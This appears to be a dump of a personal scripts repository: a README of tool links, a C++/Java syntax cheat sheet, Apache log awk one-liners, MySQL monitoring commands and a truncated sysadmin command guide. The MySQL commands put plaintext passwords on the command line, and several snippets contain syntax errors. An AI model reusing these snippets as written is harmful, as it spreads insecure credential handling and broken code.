├── README.md ├── cheatsheet └── syntax-differences-java-c++.md ├── database ├── cookielog_analysis.sh └── mysql_monitor.sh ├── linux ├── 20-sysadmin-commands.md ├── basic_command.md ├── compress_extract_files.md ├── install-pytorch-on-palmetto.md ├── install_cuda10.txt ├── nmap-cheat-sheet.md ├── ping_ok.sh └── terminal-hotkeys.md ├── monitor ├── IO.sh ├── README.md ├── awk.sh ├── cpu.sh ├── disk.sh ├── isDDOS.sh ├── mem_usage.sh ├── monitor_system.sh ├── network.sh ├── nmap-cheat-sheet.md ├── performance_tool.sh └── process.sh ├── python ├── README.md ├── fourier-transforms │ ├── FFT-Tutorial.ipynb │ ├── FFT-Tutorial.py │ ├── README.md │ └── Vertikale_Netzlast_2013.csv ├── images │ ├── FFT.png │ ├── VerticalGridLoadGermany2013-FFT.png │ └── VerticalGridLoadGermany2013.png ├── machine-learning │ ├── README.md │ ├── computeReceptiveField.py │ └── split_dataset.py ├── noise-reduction │ ├── README.md │ └── demo_filter_signal.py ├── portscan.py ├── pySorting │ ├── README.md │ ├── demo.py │ ├── images │ │ ├── Heapsort.gif │ │ ├── Merge-sort.gif │ │ ├── Selection_sort.gif │ │ ├── Sorting_gnomesort.gif │ │ ├── Sorting_quicksort.gif │ │ ├── Sorting_shaker_sort.gif │ │ ├── Sorting_shellsort.gif │ │ ├── bubble-sort.gif │ │ └── insert-sort.gif │ └── pySorting.py ├── run-length-encoding │ ├── ThresholdingAlgo.gif │ ├── ThresholdingAlgo.py │ └── run-length-encoding.md └── ssh-dictionary-attack.py └── sed-awk ├── README.md ├── awk-workflow.png ├── awk_soup ├── awk_tutorial.md ├── items.txt ├── sed_tutorial.md └── titanic.txt /README.md: -------------------------------------------------------------------------------- 1 | 2 | My collection of useful scripts, automate all the things! 3 | 4 | 5 | 6 | - [Linux](#linux) 7 | - [Python](#python) 8 | - [Cheatsheet](#cheatsheet) 9 | - [Sed/Awk](#sed) 10 | - [Monitor](#monitor) 11 | - [Network](#network) 12 | - [Database](#database) 13 | - [Tools](#tools) 14 | - [Resources](#resources) 15 | 16 | 17 | 18 | 19 | ## Linux 20 | - [compress and extract files](linux/compress_extract_files.md) 21 | - [bash-guide,A guide to learn bash](https://github.com/Idnan/bash-guide) 22 | - [basic commands](linux/basic_command.md) 23 | - [terminal-hotkeys](./linux/terminal-hotkeys.md) 24 | - [cheat allows you to create and view interactive cheatsheets on the command-line](https://github.com/chrisallenlane/cheat) 25 | - [install pytorch on palmetto](linux/install-pytorch-on-palmetto.md) 26 | - [Installing CUDA 10 on Ubuntu 18.04](linux/install_cuda10.txt) 27 | 28 | 29 | ## Python 30 | - [Google Drive Download Python Script](https://github.com/matthuisman/gdrivedl) 31 | - [VISUALIZE CODE EXECUTION](https://pythontutor.com/) 32 | - [Comprehensive Python Cheatsheet](https://github.com/gto76/python-cheatsheet) 33 | - [dynamic-firmware-analysis](https://github.com/secjey/dynamic-firmware-analysis) 34 | - [Firmware Analysis Toolkit](https://github.com/attify/firmware-analysis-toolkit) 35 | - [The most useful python snippets](https://github.com/progrmoiz/python-snippets) 36 | - [More scripts](./python/) 37 | 38 | ## Cheatsheet 39 | - [Markdown](https://github.com/adam-p/markdown-here/wiki/Markdown-Cheatsheet) 40 | - [C++ vs Java](./cheatsheet/syntax-differences-java-c++.md) 41 | 42 | 43 | ## Sed/Awk 44 | - [Sed Tutorial](sed-awk/sed_tutorial.md) 45 | - [Awk Tutorial](sed-awk/awk_tutorial.md) 46 | - [Awk Soup](sed-awk/awk_soup) 47 | 48 | 49 | ## Monitor 50 | - [CPU](monitor/cpu.sh) 51 | - [Memory](monitor/mem_usage.sh) 52 | - [Disk](monitor/disk.sh) 53 | - [Process](monitor/process.sh) 54 | - [Network](monitor/network.sh) 55 | - [isDDOS](monitor/isDDOS.sh) 56 | - [IO](monitor/IO.sh) 57 | - [system awk](monitor/awk.sh) 58 | - [monitor system](monitor/monitor_system.sh) 59 | - [performance tool](monitor/performance_tool.sh) 60 | - [htop](https://hisham.hm/htop/) 61 | - [hardinfo,System profiler and benchmark tool for Linux systems](https://github.com/lpereira/hardinfo) 62 | - [i7z,A better i7 reporting tool for Linux](https://github.com/ajaiantilal/i7z) 63 | - [screenFetch,Fetches system/theme information in terminal for Linux desktop screenshots](https://github.com/KittyKatt/screenFetch) 64 | - findmnt, find a filesystem 65 | - iotop, simple top-like I/O monitor 66 | - [Ncdu is a disk usage analyzer](https://dev.yorhel.nl/ncdu) 67 | - atop, AT computing's system & process monitor 68 | - [Glances is a cross-platform system monitoring tool written in Python](https://nicolargo.github.io/glances/) 69 | - [bem-ng,a small and simple console-based live network and disk io bandwidth monitor](https://github.com/vgropp/bwm-ng) 70 | - [cpustat,high frequency performance measurements for Linux](https://github.com/uber-common/cpustat) 71 | - [psensor,a graphical temperature monitoring application](https://wpitchoune.net/psensor/) 72 | - [lshw is a small tool to provide detailed information on the hardware configuration of the machine](https://github.com/lyonel/lshw) 73 | - pidstat,report statistics for Linux tasks 74 | 75 | 76 | ## Network 77 | - [nmap cheat sheet](./linux/nmap-cheat-sheet.md) 78 | - nload, displays the current network usage 79 | - [nethogs,Linux 'net top' tool](https://github.com/raboof/nethogs) 80 | - [bmon, bandwidth monitor and rate estimator](https://github.com/tgraf/bmon) 81 | - arpwatch, a computer software tool for monitoring Address Resolution Protocol traffic on a computer network 82 | - [iptraf,ip network monitoring software](http://iptraf.seul.org) 83 | 84 | 85 | ## Database 86 | - [mysql monitor](./database/mysql_monitor.sh) 87 | - [cookielog analysis](./database/cookielog_analysis.sh) 88 | - [mycli:A Terminal Client for MySQL with AutoCompletion and Syntax Highlighting](https://github.com/dbcli/mycli) 89 | 90 | 91 | ## Tools 92 | - [use vim as IDE](https://github.com/yangyangwithgnu/use_vim_as_ide) 93 | - [Text-mode interface for git](https://github.com/jonas/tig) 94 | - [jq is a lightweight and flexible command-line JSON processor](https://stedolan.github.io/jq/) 95 | - [ShellCheck, a static analysis tool for shell scripts](https://github.com/koalaman/shellcheck) 96 | - [yapf: A formatter for Python files](https://github.com/google/yapf) 97 | - [Mosh: the mobile shell](https://github.com/mobile-shell/mosh) 98 | - [fzf is a general-purpose command-line fuzzy finder](https://github.com/junegunn/fzf) 99 | - [PathPicker presents you with a nice UI to select which files you're interested in](https://github.com/facebook/PathPicker) 100 | - [Axel Download Accelerator](http://axel.alioth.debian.org/) 101 | - [lrzsz,automate ZModem transfers](https://github.com/mmastrac/iterm2-zmodem) 102 | - [cloc,Count Lines of Code](https://github.com/AlDanial/cloc) 103 | - [ccahe, a fast C/C++ compiler cache](https://ccache.samba.org/) 104 | - [tmux, a terminal multiplexer](https://tmux.github.io/) 105 | - [literally the future of vim](https://neovim.io/) 106 | - scriptreplay - play back typescripts, using timing information 107 | - [you-get, Dumb downloader that scrapes the web](https://github.com/soimort/you-get) 108 | - [Magnificent app which corrects your previous console command](https://github.com/nvbn/thefuck) 109 | - [Anbox is a container-based approach to boot a full Android system on a regular GNU/Linux system](https://github.com/anbox/anbox) 110 | - [getopts,parse command line in bash](http://wiki.bash-hackers.org/howto/getopts_tutorial) 111 | - [mps-youtube,Terminal based YouTube player and downloader](https://github.com/mps-youtube/mps-youtube) 112 | - [arbtt is a cross-platform, completely automatic time tracker.](https://arbtt.nomeata.de/#what) 113 | - [tldr,Simplified and community-driven man pages](https://github.com/tldr-pages/tldr) 114 | - [FIGlet is a program for making large letters out of ordinary text](http://www.figlet.org/) 115 | - [Graphviz,change text to graph](http://www.graphviz.org/) 116 | - [Pandoc,a universal document converter](http://pandoc.org/) 117 | - [http-server,a simple zero-configuration command-line http server](https://github.com/indexzero/http-server) 118 | - [oh-my-zsh,A delightful community-driven framework for managing your zsh configuration](https://github.com/robbyrussell/oh-my-zsh) 119 | - [Ag:A code-searching tool similar to ack, but faster](https://github.com/ggreer/the_silver_searcher) 120 | 121 | 122 | ## Resources 123 | - [A curated list of awesome Shell frameworks, libraries and software](https://github.com/uhub/awesome-shell) 124 | - [A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php](https://github.com/alebcay/awesome-shell) 125 | - [Use your OS X terminal shell to do awesome things](https://github.com/herrbischoff/awesome-osx-command-line) 126 | - [A set of vim, zsh, git, and tmux configuration files](https://github.com/int32bit/dotfiles) 127 | - [Curated list of awesome lists](https://github.com/sindresorhus/awesome) 128 | -------------------------------------------------------------------------------- /cheatsheet/syntax-differences-java-c++.md: -------------------------------------------------------------------------------- 1 | 2 | 3 | # C++ and Java Syntax Differences Cheat Sheet 4 | 5 | 6 | ## OOP 7 | 8 | > nullptr vs. null 9 | 10 | - C++ 11 | ```c++ 12 | int *x = nullptr; // initialize pointer to nullptr 13 | ``` 14 | 15 | - Java 16 | ```java 17 | // the compiler will catch the use of uninitialized references, but if you 18 | // need to initialize a reference so it's known to be invalid, assign null 19 | myClass x = null; 20 | ``` 21 | 22 | > Object declarations 23 | 24 | - C++ 25 | ```c++ 26 | myClass x; // on the stack 27 | 28 | myClass *x = new myClass; // or on the heap 29 | ``` 30 | 31 | - Java 32 | ```java 33 | // always allocated on the heap (also, always need parens for constructor) 34 | myClass x = new myClass(); 35 | ``` 36 | 37 | > Accessing fields of objects 38 | 39 | - C++ 40 | ```c++ 41 | myClass x; 42 | x.my_field; // If you're using a stack-based object, you access its fields with a dot 43 | // But you use the arrow operator (->) to access fields of a class when working with a pointer 44 | myClass x = new MyClass; 45 | x->my_field; // ok 46 | ``` 47 | 48 | - Java 49 | ```java 50 | //always work with references (similar to pointers--see the next), so always use a dot: 51 | myClass x = new MyClass(); 52 | x.my_field; // ok 53 | ``` 54 | 55 | > References vs. pointers 56 | 57 | - C++ 58 | ```c++ 59 | // references are immutable, use pointers for more flexibility 60 | int bar = 7, qux = 6; 61 | int& foo = bar; 62 | ``` 63 | 64 | - Java 65 | ```java 66 | // references are mutable and store addresses only to objects; no raw pointers 67 | myClass x; 68 | x.foo(); // error, x is a null ``pointer'' 69 | 70 | // note that you always use . to access a field 71 | ``` 72 | 73 | > Inheritance 74 | 75 | - C++ 76 | ```c++ 77 | class Foo : public Bar 78 | { ... }; 79 | ``` 80 | 81 | - Java 82 | ```java 83 | class Foo extends Bar 84 | { ... } 85 | ``` 86 | 87 | > Protection levels 88 | 89 | - C++ 90 | ```c++ 91 | public: 92 | void foo(); 93 | void bar(); 94 | ``` 95 | 96 | - Java 97 | ```java 98 | public void foo(); 99 | public void bar(); 100 | ``` 101 | 102 | > Virtual functions 103 | 104 | - C++ 105 | ```c++ 106 | virtual int foo(); // or, non-virtually as simply int foo(); 107 | ``` 108 | 109 | - Java 110 | ```java 111 | // functions are virtual by default; use final to prevent overriding 112 | int foo(); // or, final int foo(); 113 | ``` 114 | 115 | > Abstract classes 116 | 117 | - C++ 118 | ```c++ 119 | // just need to include a pure virtual function 120 | class Bar { public: virtual void foo() = 0; }; 121 | ``` 122 | 123 | - Java 124 | ```java 125 | // syntax allows you to be explicit! 126 | abstract class Bar { public abstract void foo(); } 127 | 128 | // or you might even want to specify an interface 129 | interface Bar { public void foo(); } 130 | 131 | // and later, have a class implement the interface: 132 | class Chocolate implements Bar 133 | { 134 | public void foo() { /* do something */ } 135 | } 136 | ``` 137 | 138 | ## ArrayList 139 | 140 | - C++ 141 | ```c++ 142 | vector v; 143 | v.push_back(10); 144 | v.pop_back(); 145 | v.size(); 146 | v.empty(); 147 | v.at(0)/v[0]; 148 | 149 | 150 | vector v {1, 2, 3, 4}; 151 | // or 152 | vector v = {1, 2, 3, 4}; 153 | ``` 154 | 155 | - Java 156 | ```java 157 | List v = new ArrayList<>(); 158 | v.add(10); 159 | v.get(0); // access an item 160 | v.set(0, 20); // change an Item 161 | v.remove(0); // remove an Item 162 | v.size(); 163 | v.clear(); 164 | 165 | // Array 166 | String[] optypes = new String[]{"A", "B", "C"}; 167 | 168 | // List 169 | List v = 170 | new ArrayList<>(Arrays.asList(5, 4, 3, 2, 1)); 171 | 172 | List copy = new ArrayList<>(origin); // Create: From Existing (Clone) 173 | ``` 174 | 175 | > Sort / Reverse 176 | 177 | - C++ 178 | ```c++ 179 | sort/reverse(arr, arr+n); 180 | sort/reverse(arr, arr+n, comp); 181 | sort/reverse(v.begin(), v,end()); 182 | ``` 183 | 184 | - Java 185 | ```java 186 | Arrays.sort(); 187 | Collections.sort/reverse(list); 188 | Collections.sort(list, Collections.reverseOrder()); 189 | Collections.sort(al, new MyComparator()); 190 | 191 | class MyComparator implements Comparator{ 192 | 193 | public int compare(T a, T b){return a.val - b.val;} 194 | 195 | } 196 | ``` 197 | 198 | ## Map 199 | 200 | - C++ 201 | ```c++ 202 | // unordered_map/ map 203 | unordered_map u; 204 | // Add two new entries to the unordered_map 205 | u["BLACK"] = "#000000"; 206 | u["WHITE"] = "#FFFFFF"; 207 | for( const auto& [key, value] : u ) cout << key << ": " << value << "\n"; 208 | u.empty(); 209 | u.begin()/ u.end(); 210 | if (u.find("RED") != u.end()) { /* do something*/ } 211 | u.erase("RED"); 212 | u.clear(); 213 | ``` 214 | 215 | - Java 216 | ```java 217 | // The HashMap gives you an unsorted, unordered Map, non-synchronized 218 | Map u = new HashMap(); 219 | u.put("BLACK", "#000000"); 220 | u.put("WHITE", "#FFFFFF"); 221 | u.get("RED"); // access an Item 222 | u.remove("RED"); // remove an Item 223 | u.size(); 224 | u.clear(); 225 | 226 | // Print keys 227 | for (String i : u.keySet()) { 228 | System.out.println(i + " value: " + u.get(i)); 229 | } 230 | 231 | // Print values 232 | for (String i : u.values()) { 233 | System.out.println(i); 234 | } 235 | ``` 236 | 237 | `LinkedHashMap` extends `HashMap`. It maintains a linked list of the entries in the map, in the order in which they were inserted. This allows insertion-order iteration over the map. 238 | ```java 239 | //Here Insertion order maintains 240 | Maplmap = new LinkedHashMap(); 241 | ``` 242 | 243 | A `TreeMap` is a `Map` that maintains its entries in ascending order, sorted according to the keys' natural ordering, or according to a Comparator provided at the time of the `TreeMap` constructor argument. 244 | ```java 245 | Map tMap = new TreeMap(); 246 | ``` 247 | 248 | > Summary 249 | 250 | - Map is collection of key-value pair (associate) objects collection 251 | - `HashMap` allows one null key, Values can be null or duplicate but keys have to be unique. 252 | - Iteration order is not constant in the case of `HashMap`. 253 | - When we need to maintain insertion order while iterating we should use `LinkedHashMap`. 254 | - `LinkedHashMap` provides all the methods same as `HashMap`. 255 | - `LinkedHashMap` is not threaded safe. 256 | - `TreeMap` is sorted order collection either natural ordering or custom ordering as per comparator. 257 | 258 | 259 | ## Set 260 | 261 | - C++ 262 | ```c++ 263 | // unordered_set/set 264 | // empty() / begin() / end() / find() / insert() / erase() / clear() 265 | ``` 266 | 267 | - Java 268 | ```java 269 | HashSet cars = new HashSet(); 270 | cars.add("BMW"); 271 | cars.add("Ford"); 272 | cars.contains("Mazda"); // Check If an Item Exists 273 | cars.remove("Volvo"); // Remove an Item 274 | cars.clear(); 275 | cars.size(); 276 | 277 | for (String i : cars) { 278 | System.out.println(i); 279 | } 280 | ``` 281 | 282 | > Differences Between HashSet, LinkedHashSet and TreeSet In Java 283 | 284 | - `HashSet` uses `HashMap` internally to store it’s elements, doesn’t maintain any order of elements. 285 | - `LinkedHashSet` uses `LinkedHashMap` internally to store it’s elements, maintains insertion order of elements. 286 | - `TreeSet` uses `TreeMap` internally to store it’s elements, orders the elements according to supplied Comparator. 287 | 288 | > https://home.csulb.edu/~pnguyen/cecs277/lecnotes/hashtree.pdf 289 | 290 | 291 | ## LinkedList 292 | 293 | - C++ 294 | ```c++ 295 | // list 296 | // begin() / end() / front() / back() / push_front() / pop_front() / push_back() / pop_back() 297 | // insert() / erase(iter) / remove(val) 298 | ``` 299 | 300 | - Java 301 | 302 | The `LinkedList` has all of the same methods of `ArrayList` class because they both implement the `List` interface. `ArrayList` has a regular array inside it, `LinkedList`: each node has a link to the next node in the list. 303 | 304 | ```java 305 | LinkedList cars = new LinkedList(); 306 | cars.add("Volvo"); 307 | cars.add("BMW"); 308 | addFirst(); // Adds an item to the beginning of the list. 309 | addLast(); // Add an item to the end of the list 310 | removeFirst(); // Remove an item from the beginning of the list. 311 | removeLast(); // Remove an item from the end of the list 312 | getFirst(); // Get the item at the beginning of the list 313 | getLast(); // Get the item at the end of the list 314 | ``` 315 | 316 | 317 | ## String 318 | 319 | - C++ 320 | ```c++ 321 | // begin() / end() / size() / empty() 322 | // operator[] / back() / front() / += / push_back() / pop_back() / insert / erase(str.begin()+9) 323 | // str.find(':') == string::npos 324 | // isalpha / isdigit 325 | 326 | istringstream iss(str); 327 | string word; 328 | while (iss >> word) { 329 | cout << word << endl; 330 | } 331 | 332 | istringstream input; 333 | input.str("a;b;c;d"); 334 | for (string line; getline(input, line, ';')) { 335 | cout << line << endl; 336 | } 337 | ``` 338 | 339 | - Java 340 | ```java 341 | String myStr = "Hello"; 342 | char result = myStr.charAt(0); 343 | 344 | String myStr1 = "Hello"; 345 | String myStr2 = "Hello"; 346 | System.out.println(myStr1.compareTo(myStr2)); // Returns 0 because they are equal 347 | equals() // Compares two strings. Returns true if the strings are equal, and false if not 348 | 349 | endsWith(); // Checks whether a string ends with the specified character(s) 350 | startsWith(); // Checks whether a string starts with specified characters 351 | toCharArray(); // Converts this string to a new character array, char[] 352 | toLowerCase(); // Converts a string to lower case letters 353 | toUpperCase(); // Converts a string to upper case letters 354 | isEmpty(); // Checks whether a string is empty or not 355 | ``` 356 | 357 | ## Queue 358 | 359 | - C++ 360 | ```c++ 361 | // queue 362 | queue q; 363 | q.push(10); 364 | q.pop(); 365 | q.front(); 366 | 367 | // priority_queue: empty() / top() / push() / pop() 368 | ``` 369 | 370 | - Java 371 | ```java 372 | Queue queue = new LinkedList(); 373 | // or 374 | Queue queue = new PriorityQueue(); 375 | 376 | //access via new for-loop 377 | for(String element : queue) { 378 | //do something with each element 379 | } 380 | 381 | //access via Iterator 382 | Iterator iterator = queue.iterator(); 383 | while(iterator.hasNext(){ 384 | String element = iterator.next(); 385 | } 386 | 387 | // Add Element to Queue 388 | // add() and offer() methods differ in how the behave if the Queue is full 389 | queue.add("element 1"); // throws an exception if full 390 | queue.offer("element 2"); // whereas the offer() method just returns false 391 | 392 | // Take Element From Queue, they differ if the Queue is empty. 393 | String element2 = queue.remove(); // throws an exception if the Queue is empty 394 | String element1 = queue.poll(); // returns null if empty 395 | 396 | // Peek at the Queue, without taking the element out of the Queue 397 | String firstElement = queue.element(); // If empty, throws an exception 398 | String firstElement = queue.peek(); // return null if empty 399 | 400 | queue.clear(); // Remove All Elements From Queue 401 | queue.size(); // Get Queue Size 402 | queue.isEmpty(); 403 | 404 | boolean containsMazda = queue.contains("Mazda"); // Check if Queue Contains Element 405 | ``` 406 | 407 | ## Stack 408 | 409 | - C++ 410 | ```c++ 411 | stack s; 412 | s.push(10); 413 | s.pop(); 414 | s.top(); 415 | s.size(); 416 | s.empty(); 417 | ``` 418 | 419 | - Java 420 | ```java 421 | Stack stack = new Stack(); 422 | stack.push("1"); 423 | String topElement = stack.pop(); 424 | String topElement = stack.peek(); // Peek at Top Element of Stack 425 | int size = stack.size(); 426 | stack.empty(); 427 | 428 | Iterator iterator = stack.iterator(); 429 | while(iterator.hasNext()){ 430 | Object value = iterator.next(); 431 | } 432 | ``` -------------------------------------------------------------------------------- /database/cookielog_analysis.sh: -------------------------------------------------------------------------------- 1 | #统计apache cookie log中访问频率最高的20个ip和访问次数 2 | cat cookielog | awk '{ a[$1] += 1; } END { for(i in a) printf("%d, %s\n", a[i], i ); }' | sort -n | tail -20 3 | 4 | #统计apache cookie log中返回404的url列表 5 | awk '$11 == 404 {print $8}' access_log | uniq -c | sort -rn | head 6 | 7 | #统计一个ip访问超过20次的ip和访问次数列表,把$1改为url对应的$9,则可以统计每个url的访问次数 8 | cat access_log | awk '{print $1}' | sort | uniq -c | sort -n | awk '{ if ($1 > 20)print $1,$2}' 9 | 10 | #统计每个url的平均访问时间 11 | cat cookielog | awk '{ a[$6] += 1; b[$6] += $11; } END { for(i in a) printf("%d, %d, %s\n", a[i],a[i]/b[i] i ); }' | sort -n | tail -20 12 | 13 | 14 | #打印访问apache的新ip列表 15 | tail -f access.log | awk -W interactive '!x[$1]++ {print $1}' 16 | 17 | #通过日志查看当天指定ip访问次数过的url和访问次数: 18 | cat access.log | grep "10.0.21.17" | awk '{print $7}' | sort | uniq -c | sort –nr 19 | 20 | 21 | #通过日志查看当天访问次数最多的时间段 22 | awk '{print $4}' access.log | grep "26/Mar/2012" |cut -c 20-50|sort|uniq -c|sort -nr|head 23 | 24 | #查看某一天的访问量 25 | cat access_log|grep '12/Nov/2012'|grep "******.htm"|wc|awk '{print $1}'|uniq 26 | 27 | #查看访问时间超过30ms的url列表 28 | cat access_log|awk ‘($NF > 30){print $7}’|sort -n|uniq -c|sort -nr|head -20 29 | 30 | #列出响应时间超过60m的url列表并统计出现次数 31 | cat access_log |awk ‘($NF > 60 && $7~/\.php/){print $7}’|sort -n|uniq -c|sort -nr|head -100 32 | 33 | #排除搜索引擎后的url访问次数 34 | sed "/Baiduspider/d;/Googlebot/d;/Sogou web spider/d;" xxx.log|awk -F' ' '{print $7}'|sort | uniq -c | sort -k1,2 -nr 35 | 36 | #统计/index.html页面的访问uv 37 | grep "/index.html" access.log | cut –d “ ” –f 4| sort | uniq | wc –l 38 | -------------------------------------------------------------------------------- /database/mysql_monitor.sh: -------------------------------------------------------------------------------- 1 | #/bin/sh 2 | 3 | #检测mysql server是否正常提供服务 4 | mysqladmin -u sky -ppwd -h localhost ping 5 | 6 | #获取mysql当前的几个状态值 7 | mysqladmin -u sky -ppwd -h localhost status 8 | 9 | #获取数据库当前的连接信息 10 | mysqladmin -u sky -ppwd -h localhost processlist 11 | 12 | #获取当前数据库的连接数 13 | mysql -u root -p123456 -BNe "select host,count(host) from processlist group by host;" information_schema 14 | 15 | #显示mysql的uptime 16 | mysql -e"SHOW STATUS LIKE '%uptime%'"|awk '/ptime/{ calc = $NF / 3600;print $(NF-1), calc"Hour" }' 17 | 18 | #查看数据库的大小 19 | mysql -u root -p123456-e 'select table_schema,round(sum(data_length+index_length)/1024/1024,4) from information_schema.tables group by table_schema;' 20 | 21 | #查看某个表的列信息 22 | mysql -u --password= -e "SHOW COLUMNS FROM " | awk '{print $1}' | tr "\n" "," | sed 's/,$//g' 23 | 24 | #执行mysql脚本 25 | mysql -u user-name -p password < script.sql 26 | 27 | #mysql dump数据导出 28 | mysqldump -uroot -T/tmp/mysqldump test test_outfile --fields-enclosed-by=\" --fields-terminated-by=, 29 | 30 | #mysql数据导入 31 | mysqlimport --user=name --password=pwd test --fields-enclosed-by=\" --fields-terminated-by=, /tmp/test_outfile.txt 32 | LOAD DATA INFILE '/tmp/test_outfile.txt' INTO TABLE test_outfile FIELDS TERMINATED BY '"' ENCLOSED BY ','; 33 | 34 | #mysql进程监控 35 | ps -ef | grep "mysqld_safe" | grep -v "grep" 36 | ps -ef | grep "mysqld" | grep -v "mysqld_safe"| grep -v "grep" 37 | 38 | 39 | #查看当前数据库的状态 40 | mysql -u root -p123456 -e 'show status' 41 | 42 | 43 | #mysqlcheck 工具程序可以检查(check),修 复( repair),分 析( analyze)和优化(optimize)MySQL Server 中的表 44 | mysqlcheck -u root -p123456 --all-databases 45 | 46 | #mysql qps查询 QPS = Questions(or Queries) / Seconds 47 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Questions"' 48 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Queries"' 49 | 50 | #mysql Key Buffer 命中率 key_buffer_read_hits = (1 - Key_reads / Key_read_requests) * 100% key_buffer_write_hits= (1 - Key_writes / Key_write_requests) * 100% 51 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Key%"' 52 | 53 | #mysql Innodb Buffer 命中率 innodb_buffer_read_hits=(1-Innodb_buffer_pool_reads/Innodb_buffer_pool_read_requests) * 100% 54 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Innodb_buffer_pool_read%"' 55 | 56 | #mysql Query Cache 命中率 Query_cache_hits= (Qcache_hits / (Qcache_hits + Qcache_inserts)) * 100% 57 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Qcache%"' 58 | 59 | #mysql Table Cache 状态量 60 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Open%"' 61 | 62 | #mysql Thread Cache 命中率 Thread_cache_hits = (1 - Threads_created / Connections) * 100% 正常来说,Thread Cache 命中率要在 90% 以上才算比较合理。 63 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Thread%"' 64 | 65 | #mysql 锁定状态:锁定状态包括表锁和行锁两种,我们可以通过系统状态变量获得锁定总次数,锁定造成其他线程等待的次数,以及锁定等待时间信息 66 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "%lock%"' 67 | 68 | #mysql 复制延时量 在slave节点执行 69 | mysql -u root -p123456 -e 'SHOW SLAVE STATUS' 70 | 71 | #mysql Tmp table 状况 Tmp Table 的状况主要是用于监控 MySQL 使用临时表的量是否过多,是否有临时表过大而不得不从内存中换出到磁盘文件上 72 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Created_tmp%"' 73 | 74 | #mysql Binlog Cache 使用状况:Binlog Cache 用于存放还未写入磁盘的 Binlog 信 息 。 75 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Binlog_cache%"' 76 | 77 | #mysql nnodb_log_waits 量:Innodb_log_waits 状态变量直接反应出 Innodb Log Buffer 空间不足造成等待的次数 78 | mysql -u root -p123456 -e 'SHOW /*!50000 GLOBAL */ STATUS LIKE "Innodb_log_waits' 79 | -------------------------------------------------------------------------------- /linux/20-sysadmin-commands.md: -------------------------------------------------------------------------------- 1 | 20 Linux commands every sysadmin should know 2 | 3 | > If your application isn't working - or you're just looking for more information - these 20 commands will come in handy. 4 | 5 | 6 | ## 1. curl 7 | 8 | It is useful for determining if your application can reach another service, such as a database, or checking if your service is healthy. 9 | 10 | The **-I** option shows the header information and the **-s** option silences the response body. 11 | 12 | ```sh 13 | $ curl -I -s database:27017 14 | HTTP/1.0 200 OK 15 | 16 | $ curl -I -s https://opensource.com 17 | HTTP/1.1 200 OK 18 | ``` 19 | 20 | ## 2. python -m json.tool / jq 21 | 22 | Sometimes, you want to pretty-print the JSON output to find a specific entry. Python has a bulit-in JSON library that can help with this. 23 | 24 | ```sh 25 | $ cat test.json 26 | {"title":"Person","type":"object","properties":{"firstName":{"type":"string"},"lastName":{"type":"string"},"age":{"description":"Age in years","type":"integer","minimum":0}},"required":["firstName","lastName"]} 27 | ``` 28 | 29 | To use the Python library, pipe the output to Python with the -m (module) option. 30 | 31 | ```sh 32 | $ cat test.json | python -m json.tool 33 | { 34 | "properties": { 35 | "age": { 36 | "description": "Age in years", 37 | "minimum": 0, 38 | "type": "integer" 39 | }, 40 | "firstName": { 41 | "type": "string" 42 | }, 43 | "lastName": { 44 | "type": "string" 45 | } 46 | }, 47 | "required": [ 48 | "firstName", 49 | "lastName" 50 | ], 51 | "title": "Person", 52 | "type": "object" 53 | } 54 | ``` 55 | 56 | ## 3. ls 57 | 58 | lists files in a directory 59 | 60 | ```sh 61 | $ ./myapp 62 | bash: ./myapp: Permission denied 63 | $ ls -l myapp 64 | -rw-r--r--. 1 root root 33 Jul 21 18:36 myapp 65 | ``` 66 | 67 | ## 4. tail 68 | 69 | displays the last part of a file 70 | 71 | ```sh 72 | # -f indicates the "follow", which outputs the log lines as they are written to the file 73 | $ tail -f /var/log/httpd/access_log 74 | 75 | # see the last 100 lines of the file 76 | $ tail -n 100 /var/log/httpd/access_log 77 | ``` 78 | 79 | ## 5. cat 80 | 81 | ```sh 82 | $ cat requirements.txt 83 | flask 84 | flask_pymongo 85 | ``` 86 | 87 | ## 6. grep 88 | 89 | **grep** searches file patterns. 90 | 91 | ``sh 92 | $ cat tomcat.log | grep org.apache.catalina.startup.Catalina.start 93 | 01-Jul-2017 18:03:47.542 INFO [main] org.apache.catalina.startup.Catalina.start Server startup in 681 ms 94 | ``` 95 | 96 | ## 7. ps 97 | 98 | shows process status. 99 | ```sh 100 | $ ps -ef 101 | UID PID PPID C STIME TTY TIME CMD 102 | root 1 0 2 18:55 ? 00:00:02 /docker-java-home/jre/bi 103 | root 59 0 0 18:55 pts/0 00:00:00 /bin/sh 104 | root 75 59 0 18:57 pts/0 00:00:00 ps -ef 105 | 106 | $ ps -ef | grep tomcat 107 | root 1 0 1 18:55 ? 00:00:02 /docker-java-home/jre/bi 108 | ``` 109 | 110 | ## 8. env 111 | 112 | allows you to set or print the environment variables. 113 | ```sh 114 | $ env 115 | PYTHON_PIP_VERSION=9.0.1 116 | HOME=/root 117 | DB_NAME=test 118 | PATH=/usr/local/bin:/usr/local/sbin 119 | LANG=C.UTF-8 120 | PYTHON_VERSION=3.4.6 121 | PWD=/ 122 | DB_URI=mongodb://database:27017/test 123 | ``` 124 | 125 | ## 9. top 126 | 127 | displays and updates sorted process information. While it runs, you hit the "C" key to see the full command and reverse-engineer if the process is your application. 128 | 129 | ## 10. netstat 130 | 131 | shows the network status. This command shows network ports in use and their incoming connections. 132 | 133 | ## 11. ip address 134 | 135 | ## 12. lsof 136 | 137 | lists the open files associated with your application. In Linux, almost any interaction with the system is treated like a file. As a result, if your application writes to a file or opens a network connection, **lsof** will reflect that interaction as a file. 138 | 139 | ```sh 140 | $ lsof -i tcp:80 141 | $ lsof -p 18311 142 | ``` 143 | 144 | The name of the open file in the list of open files helps pinpoint the origin of the process, specifically Apache. 145 | 146 | ## 13. df 147 